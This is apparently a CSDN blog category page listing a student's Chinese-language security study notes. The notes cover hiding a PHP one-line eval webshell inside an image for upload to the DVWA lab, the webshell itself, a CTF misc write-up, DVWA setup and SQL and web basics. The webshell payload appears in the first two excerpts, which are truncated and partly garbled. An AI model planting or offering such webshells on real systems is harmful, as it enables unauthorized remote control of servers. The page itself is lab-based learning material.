![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
文章平均质量分 58
summcer
这个作者很懒,什么都没留下…
展开
-
图片写入一句话木马
图片制作一句话木马:1:选择一个图片用工具打开,winhex或者其他工具都可以,例如我选取一张图片用winhex打开,然后在其后写入一句话木马,在这里我的一句话木马是:<?php @eval($_POST['pass']);?>可以发现成功写入。将此文件上传入dvwa后,在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg此时dvwa出现/…/hackable/uploads/1.jpg succesf原创 2021-03-28 22:47:13 · 6432 阅读 · 3 评论 -
一句话木马
一:一句话木马:标准代码形式:<?php @eval($_POST[‘attack’]) ?>eval()函数表示括号内的语句字符串什么的全都当做代码执行POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php的一句话木马:<?php@eval(_POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php的一句话木马: <?php @eval(POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:p原创 2021-03-27 14:49:08 · 21735 阅读 · 0 评论 -
2021网安第一次团队内小比赛
Misc:1:看你的刷新键是什么:这个主要是f5提示,然后是一个工具叫f5-steganography。f5-steganography工具运行必须要有Java环境,从根目录进入cmd后,输入java -Extracrt -文件名称.jpg -p 文件名。然后回车执行命令,出现output文件,打开查看后就出现flag2:easy题。在这个修改成zip格式后发现,需要密码,猜测是假加密,然后拖入winhex后查看文件类型,查看文件点,发现是伪加密,修改后正常打开,然后出现flag。3:看你们认不认真:原创 2021-03-23 19:56:12 · 169 阅读 · 0 评论 -
dvwa搭建
sal注入:当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。数据库类型:sql:oracle、MySQL、mssql、access、sqlite、postgersqlnosql:mongodb、redisdvwa搭建:下载小皮与dvwa,dvwa解压到www目录下,进入站点127.0.0.1。修改一个PHP文件后进入,在访问http://127.0.0.1/dvwa/setup.php的时候会报错,这时需要改ini配置以及进入原创 2021-03-14 12:36:28 · 225 阅读 · 0 评论 -
sql
一:联合查询:联合查询分类内连接(inner Join 或 Join)外连接(outer Join)左外连接(left outer Join 或 left Join)右外连接(right outer Join 或 right Join)全外连接(full outer Join 或 full Join)交叉连接 (cross Join)结果集链接 (union 和 union all)联合查询介绍相关数据表如下:A表在这里插入图片描述B表在这里插入图片描述C表在这里插入图片描述原创 2021-02-07 17:35:06 · 104 阅读 · 1 评论 -
html以及PHP等相关内容
HTML一个完整的HTML基本程序页面包括声明文档,根元素,元素文档定义数据和网页编码格式,标题页面内容以及定义标题和段落。HTML标签由尖括号内的关键词,并且经常是成对出现的,比如,标签中第一个标签是开始标签,第二个标签是结束标签。其中<!doctype>声明不用区分大小写,并且不同的声明内容表示不同的文档,登录框的编写<head> <meta charset="UTF-8"> <title>标题</title>原创 2021-01-24 17:30:31 · 221 阅读 · 2 评论 -
二进制入门
一:二进制安全:二进制安全是一种主要用于字符串操作函数相关的计算机编程术语。一个二进制安全功能(函数),其本质上将操作输入作为原始的、无任何特殊格式意义的数据流。对于每个字符都公平对待,不特殊处理某一个字符。二. 为什么学习,学习后可以做些什么?首先提出一个问题,不知道大家有没有碰到过在写代码中遇到过以下这样的问题:明明看起来代码写的毫无问题,但是却在main函数之前就已经报错。碰到一款好的软件,但是广告太烦无法关闭。你想知道一款软件的功能是如何实现的,却苦于没有源代码。软件出现崩溃,想要找原创 2021-01-17 16:42:11 · 1418 阅读 · 2 评论 -
认知数据库相关知识
第一周web一、什么是数据库?一般一个数据库系统(Database System)可分为两个部分:数据库(Database)数据管理系统(Database Management System,DBMS)A Database is an organized collection of data. —— Wikipedia数据库 就是 有组织的数据集合 ,存储在一个或多个磁盘文件中,俗称「数据的仓库」。广义上来讲,只要能储存数据的都能算数据库(如txt文档、Excel表格等)。Database M原创 2021-01-16 14:32:19 · 239 阅读 · 1 评论